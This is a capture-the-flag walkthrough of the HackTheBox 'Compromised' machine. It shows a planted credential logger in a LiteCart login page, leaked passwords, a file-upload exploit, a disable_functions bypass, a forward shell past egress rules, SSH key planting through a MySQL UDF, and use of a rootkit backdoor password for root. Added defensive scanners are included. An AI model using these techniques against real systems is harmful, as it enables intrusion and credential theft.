# HackTheBox - Compromised

![](https://1033785646-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXzdi_mbSkB5NqqwWVy%2F-MZxRoavN7NVGvOkMkwg%2F-MZxT0TM0-sg2fALKV1t%2Fimage.png?alt=media\&token=c6cc45b1-31e8-4fb6-819b-dfb9c742af31)

### Nmap scan results

![](https://1033785646-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXzdi_mbSkB5NqqwWVy%2F-MZxRoavN7NVGvOkMkwg%2F-MZxStcS8jCWWk1McpOO%2Fimage.png?alt=media\&token=a925ca57-2ffe-43c7-858e-d6f137e48940)

Adding **`compromised.htb`** to the /etc/hosts file, and starting an **all-port scan** in the background.

![](https://1033785646-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXzdi_mbSkB5NqqwWVy%2F-MZxRoavN7NVGvOkMkwg%2F-MZxTVHGcdF8P4KJQVY0%2Fimage.png?alt=media\&token=7945994d-57d6-44bd-91ac-c6c6eaccbacc)

### Using gobuster to scan for directories and files

```bash
gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://compromised.htb/ -o go-dirscan.out -x php,html,tx
```

![](https://1033785646-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXzdi_mbSkB5NqqwWVy%2F-MZxRoavN7NVGvOkMkwg%2F-MZxUaaawglLSTr8Kd4u%2Fimage.png?alt=media\&token=38aa3a8e-451e-4988-8ed9-ad634288a456)

![](https://1033785646-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXzdi_mbSkB5NqqwWVy%2F-MZxRoavN7NVGvOkMkwg%2F-MZxUCQVB7NHShAaBB28%2Fimage.png?alt=media\&token=ca6fd041-5ec4-49d6-b5ec-1ea5c10cdee6)

![](https://1033785646-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXzdi_mbSkB5NqqwWVy%2F-MZxRoavN7NVGvOkMkwg%2F-MZxUpWe06zsM1VXJZy6%2Fimage.png?alt=media\&token=a9b4231b-757b-49b9-a9b4-15d4e9099c9b)

### Using timestamps to get recently modified files

Now that we have a backup of the CMS that is running, we can search it for configuration files. There is one trick I learned from **ippsec**: use timestamps to list the most recently modified files.

```bash
# -printf is evaluated before -type f here, so directories are listed as well;
# sorting on the timestamp prefix puts the most recently modified entries last
find . -printf "%T+ %p\n" -type f | sort -u
```

![](https://1033785646-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXzdi_mbSkB5NqqwWVy%2F-MZxRoavN7NVGvOkMkwg%2F-MZxVjmCuekdi_kA8sAm%2Fimage.png?alt=media\&token=95b0307c-8af4-4ebf-9b2c-d1cb9f39514c)

These were the most recently modified entries:

```text
2020-09-03+17:19:16.0000000000 ./includes/library
2020-09-03+17:19:16.0000000000 ./includes/library/lib_user.inc.php
2020-09-03+17:20:34.0000000000 ./admin/login.php
2020-09-03+17:20:56.0000000000 ./admin
```

```php
<?php
  // admin/login.php as recovered from the backup; note the commented-out credential logger below
  require_once('../includes/app_header.inc.php');

  document::$template = settings::get('store_template_admin');
  document::$layout = 'login';

  if (!empty($_GET['redirect_url'])) {
    $redirect_url = (basename(parse_url($_REQUEST['redirect_url'], PHP_URL_PATH)) != basename(__FILE__)) ? $_REQUEST['redirect_url'] : document::link(WS_DIR_ADMIN);
  } else {
    $redirect_url = document::link(WS_DIR_ADMIN);
  }

  header('X-Robots-Tag: noindex');
  document::$snippets['head_tags']['noindex'] = '<meta name="robots" content="noindex" />';

  if (!empty(user::$data['id'])) notices::add('notice', language::translate('text_already_logged_in', 'You are already logged in'));

  if (isset($_POST['login'])) {
    //file_put_contents("./.log2301c9430d8593ae.txt", "User: " . $_POST['username'] . " Passwd: " . $_POST['password']);
    user::login($_POST['username'], $_POST['password'], $redirect_url, isset($_POST['remember_me']) ? $_POST['remember_me'] : false);
  }

  if (empty($_POST['username']) && !empty($_SERVER['PHP_AUTH_USER'])) $_POST['username'] = !empty($_SERVER['PHP_AUTH_USER']) ? $_SERVER['PHP_AUTH_USER'] : '';

  $page_login = new view();
  $page_login->snippets = array(
    'action' => $redirect_url,
  );
  echo $page_login->stitch('pages/login');

  require_once vmod::check(FS_DIR_HTTP_ROOT . WS_DIR_INCLUDES . 'app_footer.inc.php');

?>
```

```php
if (isset($_POST['login'])) {
  //file_put_contents("./.log2301c9430d8593ae.txt", "User: " . $_POST['username'] . " Passwd: " . $_POST['password']);
  user::login($_POST['username'], $_POST['password'], $redirect_url, isset($_POST['remember_me']) ? $_POST['remember_me'] : false);
}
```

The commented-out line above was logging the admin username and password to a **`.log2301c9430d8593ae.txt`** file next to the login script. That file may still be on the web server, so let's try to fetch it.

> **User: admin   Passwd: theNextGenSt0r3!\~**
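As an added example (not part of the original writeup), here is a small scanner for the kind of planted credential logger found in admin/login.php above. It deliberately inspects commented-out lines too, because here the logger was commented out after the fact while the log file it wrote was left on the server. The sample PHP source is constructed around the line quoted above.

```python
import re

# Constructed sample: the planted (commented-out) logger plus ordinary login code.
SAMPLE_PHP = r'''<?php
  if (isset($_POST['login'])) {
    //file_put_contents("./.log2301c9430d8593ae.txt", "User: " . $_POST['username'] . " Passwd: " . $_POST['password']);
    user::login($_POST['username'], $_POST['password'], $redirect_url, false);
  }
'''

# Functions that write to disk or send data out of the process.
SINK = re.compile(r"\b(file_put_contents|fwrite|fputs|error_log|mail|curl_setopt)\s*\(")
# A password taken straight from the request superglobals.
SECRET = re.compile(r"\$_(POST|REQUEST|GET|SERVER)\[['\"](pass(word|wd)?|PHP_AUTH_PW)['\"]\]", re.I)
# A quoted file name with a log-like extension, so the responder knows what to look for.
LOGFILE = re.compile(r"[\"']([^\"']*\.(txt|log|dat))[\"']")

def find_credential_sinks(src):
    """Return (line_no, commented_out, log_path) for every line that passes a
    request password into a write/send sink, whether or not it is commented out."""
    hits = []
    for no, line in enumerate(src.splitlines(), 1):
        if SINK.search(line) and SECRET.search(line):
            commented = line.lstrip().startswith(("//", "#", "*"))
            m = LOGFILE.search(line)
            hits.append((no, commented, m.group(1) if m else None))
    return hits
```

A commented-out hit is still worth acting on: the log file it names may still be readable over HTTP, as it was here.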

### Exploiting LiteCart (Vulnerable to Arbitrary File Upload)

**`Version Used : LiteCart 2.1.2`**

![](https://1033785646-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXzdi_mbSkB5NqqwWVy%2F-MZxRoavN7NVGvOkMkwg%2F-MZxYLSKdewW69c8qjnt%2Fimage.png?alt=media\&token=7021ad56-e7b2-4d63-8c99-9a93f6b34d2f)

![](https://1033785646-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXzdi_mbSkB5NqqwWVy%2F-MZxRoavN7NVGvOkMkwg%2F-MZxYX7yjvNGUl9PyBpJ%2Fimage.png?alt=media\&token=48749d45-3663-47e4-9eee-5218633a1681)

Upload a PHP file and change the **Content-Type** header to `application/xml`.

![](https://1033785646-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXzdi_mbSkB5NqqwWVy%2F-MZxRoavN7NVGvOkMkwg%2F-MZxYz4BkVHQrRwVAi8F%2Fimage.png?alt=media\&token=2be683f0-cc83-409c-9a29-8ec6b3cc6bec)

Now visit <http://compromised.htb/shop/vqmod/xml/demo.php> and you should get the following page.

![](https://1033785646-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXzdi_mbSkB5NqqwWVy%2F-MZxRoavN7NVGvOkMkwg%2F-MZxZAi9tM2HksTK-gPm%2Fimage.png?alt=media\&token=900be03a-62c5-40b2-b5be-362ffcd757ca)

### PHP disable\_functions bypass

The only problem is that we can't execute system commands through PHP. This is probably because of PHP [disabled functions](https://www.a2hosting.in/kb/developer-corner/php/using-php.ini-directives/php-disable_functions-directive). To check, we can call **`phpinfo()`** and look at the `disable_functions` directive.

![](https://1033785646-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXzdi_mbSkB5NqqwWVy%2F-MZxRoavN7NVGvOkMkwg%2F-MZx_WdJodzlBD59FuWn%2Fimage.png?alt=media\&token=240cd90b-565c-458a-bd63-0079f948b384)

There are two ways to get a shell on the box. The first is to use weevely (**Weevely** is a stealth PHP web shell that simulates a telnet-like connection. It is an essential tool for web application post-exploitation, and can be used as a stealth backdoor or as a web shell to manage legitimate web accounts, even free hosted ones.) and the other is to use the **`disable_functions bypass - PHP 7.0-7.4`** script.

{% embed url="<https://book.hacktricks.xyz/pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-7.0-7.4-nix-only>" %}

Get the exploit from [here](https://github.com/mm0r1/exploits/blob/master/php7-backtrace-bypass/exploit.php) and upload it. We can even modify the script a bit to take the command from a GET/POST parameter and execute it, rather than editing the values in by hand.

![](https://1033785646-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXzdi_mbSkB5NqqwWVy%2F-MZxRoavN7NVGvOkMkwg%2F-MZxcfHDZllYUX-836Ig%2Fimage.png?alt=media\&token=b8c5d13f-52b9-4621-b199-443c1b26a1f4)

![](https://1033785646-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXzdi_mbSkB5NqqwWVy%2F-MZxRoavN7NVGvOkMkwg%2F-MZxd1TzEU5FMGptzjDA%2Fimage.png?alt=media\&token=ea03b2c2-6f94-4b4f-9388-7d81523191b8)

We can't get a reverse shell because of the firewall rules. To check the **`iptables`** rules, we can browse to **`/etc/iptables`** and read the saved rule set.

```text
# Generated by iptables-save v1.6.1 on Mon May 11 02:27:29 2020
*filter
:INPUT DROP [6:1032]
:FORWARD DROP [0:0]
:OUTPUT DROP [5:394]
-A INPUT -i lo -j ACCEPT
-A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT
-A INPUT -p tcp -m tcp --dport 22 -m tcp -j ACCEPT
-A INPUT -p tcp -m tcp --dport 80 -m tcp -j ACCEPT
-A INPUT -p icmp -m icmp --icmp-type 0 -j ACCEPT
-A INPUT -p icmp -m icmp --icmp-type 8 -j ACCEPT
-A OUTPUT -m state --state RELATED,ESTABLISHED -j ACCEPT
-A OUTPUT -p tcp -m tcp --sport 22 -m tcp -j ACCEPT
-A OUTPUT -p tcp -m tcp --sport 80 -m tcp -j ACCEPT
COMMIT
# Completed on Mon May 11 02:27:29 2020
```

Instead we can use a forward shell, which carries the shell's input and output over the HTTP requests we can already make, so no new outbound connection is needed.
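To make the effect of those rules concrete, here is an added example (not from the writeup or from the forward-shell project) that evaluates the OUTPUT chain the way the kernel does: first matching rule wins, otherwise the chain policy applies. The rule text is taken from the dump above with the INPUT chain abridged, and port 4444 for the reverse-shell attempt is a constructed value.

```python
# Constructed from the iptables-save output quoted above (INPUT chain abridged).
IPTABLES_SAVE = """\
:INPUT DROP [6:1032]
:OUTPUT DROP [5:394]
-A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT
-A INPUT -p tcp -m tcp --dport 80 -m tcp -j ACCEPT
-A OUTPUT -m state --state RELATED,ESTABLISHED -j ACCEPT
-A OUTPUT -p tcp -m tcp --sport 22 -m tcp -j ACCEPT
-A OUTPUT -p tcp -m tcp --sport 80 -m tcp -j ACCEPT
COMMIT
"""

def parse_rules(text):
    """Return ({chain: policy}, [rule dicts]) from iptables-save output."""
    policies, rules = {}, []
    for line in text.splitlines():
        if line.startswith(":"):  # ":CHAIN POLICY [pkts:bytes]"
            chain, policy = line[1:].split()[:2]
            policies[chain] = policy
        elif line.startswith("-A "):
            toks = line.split()
            rule = {"chain": toks[1], "target": toks[toks.index("-j") + 1]}
            for flag, key in (("-i", "iface"), ("-p", "proto"),
                              ("--dport", "dport"), ("--sport", "sport")):
                if flag in toks:
                    rule[key] = toks[toks.index(flag) + 1]
            if "--state" in toks:  # conntrack match: packet state must be one listed
                rule["states"] = set(toks[toks.index("--state") + 1].split(","))
            rules.append(rule)
    return policies, rules

def verdict(policies, rules, chain, pkt):
    """First rule whose every match fits the packet decides; otherwise the chain policy."""
    for r in rules:
        if r["chain"] != chain:
            continue
        ok = all(pkt.get(k) == r[k] for k in ("iface", "proto", "dport", "sport") if k in r)
        if ok and "states" in r:
            ok = pkt.get("state") in r["states"]
        if ok:
            return r["target"]
    return policies[chain]

def egress_summary(text=IPTABLES_SAVE):
    """Compare a reverse-shell connect with forward-shell replies on the HTTP session."""
    pol, rules = parse_rules(text)
    new_out = {"proto": "tcp", "dport": "4444", "state": "NEW"}          # constructed port
    http_reply = {"proto": "tcp", "sport": "80", "state": "ESTABLISHED"}  # reply on existing session
    return {"reverse_shell": verdict(pol, rules, "OUTPUT", new_out),
            "forward_shell": verdict(pol, rules, "OUTPUT", http_reply)}
```

The verdicts show the whole story: a brand-new outbound connection falls through to the OUTPUT policy and is dropped, while replies on the already-established port 80 session are accepted, which is the channel the forward shell rides on.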

{% embed url="<https://github.com/IppSec/forward-shell>" %}

### Using forward shell to shell access

![](https://1033785646-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXzdi_mbSkB5NqqwWVy%2F-MZxRoavN7NVGvOkMkwg%2F-MZxeVCEbjLOU45w5APu%2Fimage.png?alt=media\&token=9f8b711b-f54c-4746-88e3-480483879388)

We can even upgrade the shell (it uses **`pty`** from Python) by typing the `upgrade` command.

{% hint style="info" %}
The **pty** module defines operations for handling the pseudo-terminal concept: starting another process and being able to write to and read from its controlling terminal programmatically. ... Connect the child's controlling terminal to a pseudo-terminal. The return value is (pid, fd).
{% endhint %}

![](https://1033785646-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXzdi_mbSkB5NqqwWVy%2F-MZxRoavN7NVGvOkMkwg%2F-MZxepiS4tFdHtAZT4p4%2Fimage.png?alt=media\&token=a053fb17-b15d-41fc-b19d-4916f99797ff)

### Misconfiguration in MySQL

```php
// Database Configs
// (the shop connects to MySQL as the root user, with a default-looking password)
  define('DB_TYPE', 'mysql');
  define('DB_SERVER', 'localhost');
  define('DB_USERNAME', 'root');
  define('DB_PASSWORD', 'changethis');
  define('DB_DATABASE', 'ecom');
  define('DB_TABLE_PREFIX', 'lc_');
  define('DB_CONNECTION_CHARSET', 'utf8');
  define('DB_PERSISTENT_CONNECTIONS', 'false');
```

The mysql user has been given a login shell: it is usually set to **`/bin/false`**, but here it is set to **`/bin/bash`**, which is strange. That means we can SSH in as that user.

```text
mysql:x:111:113:MySQL Server,,,:/var/lib/mysql:/bin/bash
```
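As an added example (not from the writeup), here is a small audit that flags exactly this misconfiguration: system accounts whose shell still permits interactive login. The passwd sample is constructed, with the mysql line being the one quoted above; the UID boundary follows the Debian/Ubuntu convention and is an assumption for other distributions.

```python
# Constructed sample /etc/passwd; the mysql line is the one found on the box.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
mysql:x:111:113:MySQL Server,,,:/var/lib/mysql:/bin/bash
sysadmin:x:1000:1000:sysadmin:/home/sysadmin:/bin/bash
"""

# Shells that refuse interactive login, the normal setting for service accounts.
NOLOGIN_SHELLS = {"/bin/false", "/usr/sbin/nologin", "/sbin/nologin", "/bin/sync"}
SYSTEM_UID_MAX = 999  # Debian/Ubuntu convention: UIDs below 1000 are system accounts

def parse_passwd(text):
    """Yield (name, uid, home, shell) for every well-formed 7-field passwd line."""
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) != 7 or not fields[2].isdigit():
            continue
        yield fields[0], int(fields[2]), fields[5], fields[6]

def interactive_service_accounts(text=SAMPLE_PASSWD):
    """Return (name, shell, home) for non-root system accounts that can log in.

    The home directory is reported because an .ssh/authorized_keys file placed
    there is what turns a stray login shell into SSH access, as in this writeup.
    """
    return [(name, shell, home) for name, uid, home, shell in parse_passwd(text)
            if 0 < uid <= SYSTEM_UID_MAX and shell not in NOLOGIN_SHELLS]
```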

Let's see if **mysql** has UDFs (user-defined functions) present. We have the credentials to connect.

![](https://1033785646-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXzdi_mbSkB5NqqwWVy%2F-MZxRoavN7NVGvOkMkwg%2F-MZxg8Z1BrFDINaXfreB%2Fimage.png?alt=media\&token=aa23b1d2-be6c-4f5c-ae91-042f9a0492d9)

Looks like we can run commands as the mysql user.

![](https://1033785646-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXzdi_mbSkB5NqqwWVy%2F-MZxRoavN7NVGvOkMkwg%2F-MZxgR-eNtZbwqmc24_G%2Fimage.png?alt=media\&token=b0884caa-787c-4d92-90c6-1e73d72e4299)

One thing we can do is create a **`.ssh`** directory in the mysql user's home and copy our **`public key`** into its `authorized_keys`. This is how we get a shell as mysql over SSH.

```bash
# Create an SSH key pair
ssh-keygen -f mysql
```

```sql
select exec_cmd('mkdir .ssh');
select exec_cmd('echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCkB5LPkMjts3c9RE8ea1ftX+xMCA2ppgNYP5B1mxkW/3vR185WS+KamWjrTZ3NImNkWuC2MEn1og6aIUZ4R0jPvccHeX0urY2wH4AFnjKL6Hu03hra2HWt3ca2SgiKgKHjZUWWlVeow5tTlWSDgJQ12faugpn6sWfPYmPMX/iVIiCBRbURVRDQP+7c/MUCqEmtITwH8atCFNyjLHM7B9d210SJb+1eP++ZDydFFpd1bMhe79ABwHY5YC1Lm3h0cZTYjGicbwVp0RLIUIrtyz0Y8u/I+2nZyINLYEYeIUDavLBK/B/BrX8NgsQoH/n9cEboBKN+MSsaWYx3exIXB8chUZkoPQ4xff3qfiGYsO5xO2GnBscmkicGWTNOXKpGj9iYZTX654XtUBRBJwcJFuxg46i+9SNlkxj/xHLYeIHfBNPe+DyRgg2k/E4bTnzbC8La1Sa3CJpMUqzPWRwrhBeLrp2ThowNOuDYokjYBpeAu6tA2XyDPGfCZkhvntncV5U= root@LAPTOP-UFMALO92" > .ssh/authorized_keys');
select exec_cmd('chmod 600 .ssh/authorized_keys');
```

![](https://1033785646-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXzdi_mbSkB5NqqwWVy%2F-MZxRoavN7NVGvOkMkwg%2F-MZxh_7N12rv00g6GU18%2Fimage.png?alt=media\&token=bb4a98b2-df4c-492c-b073-5f69f4fb5e56)

### Analyzing the strace-log.dat (Keylogger)

![](https://1033785646-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXzdi_mbSkB5NqqwWVy%2F-MZxRoavN7NVGvOkMkwg%2F-MZxkSQhBjxJtNm-cZ5F%2Fimage.png?alt=media\&token=c5122d33-cbd2-4118-a8a4-4a6559501831)

This strace-log.dat file is recording all the keystrokes; if you look at it carefully you can see a pattern. See the screenshot below.

![](https://1033785646-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXzdi_mbSkB5NqqwWVy%2F-MZxRoavN7NVGvOkMkwg%2F-MZxkX1hZmCC7RV3wrSV%2Fimage.png?alt=media\&token=9a9d7f16-ab58-4165-8126-a1759765c903)

```bash
mysql -u root --password 3*NLJE32I$Fe
```

![](https://1033785646-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXzdi_mbSkB5NqqwWVy%2F-MZxRoavN7NVGvOkMkwg%2F-MZxl0BACsCYnvzdb1NP%2Fimage.png?alt=media\&token=c84605a8-e14e-4a88-8eb4-9bbaebfa48ba)

This is also the password for the sysadmin user: **`3*NLJE32I$Fe`**

![](https://1033785646-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXzdi_mbSkB5NqqwWVy%2F-MZxRoavN7NVGvOkMkwg%2F-MZxlJGWOLS9abQd6nDp%2Fimage.png?alt=media\&token=5bfcae58-3649-4c61-ba24-4827198bd833)

### Exploiting LD\_PRELOAD Rootkit (libdate.so)

![](https://1033785646-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXzdi_mbSkB5NqqwWVy%2F-MZxRoavN7NVGvOkMkwg%2F-MZxnbvPV_Z-auoyvwDF%2Fimage.png?alt=media\&token=9d973720-9675-4194-9618-c21a59a2af97)

We can analyze the libdate.so file in Ghidra. Get the file using scp.

```bash
scp sysadmin@10.10.10.207:/lib/x86_64-linux-gnu/libdate.so .
```

![](https://1033785646-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXzdi_mbSkB5NqqwWVy%2F-MZxRoavN7NVGvOkMkwg%2F-MZxoJZAZvsQs_tlpxSH%2Fimage.png?alt=media\&token=d1a280b8-effb-4f46-a94d-60743fb11553)

Looking at the **`local_x`** variables, the code compares the supplied input against their decoded value and, if it matches, runs **`/bin/sh`**. Let's decode those variable values using [CyberChef](https://gchq.github.io/CyberChef/).

Decoded Value : **`2wkeOU4sjv84ok/`**

So when a SUID binary that accepts user input is run and we enter the value we just decoded, we get a root shell. Let's try that with the **`su`** (substitute user) binary.

![](https://1033785646-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXzdi_mbSkB5NqqwWVy%2F-MZxRoavN7NVGvOkMkwg%2F-MZxp4xYbVcYGZiOT_xq%2Fimage.png?alt=media\&token=ed5a26f8-78ca-49aa-b04c-fbbfc3719352)
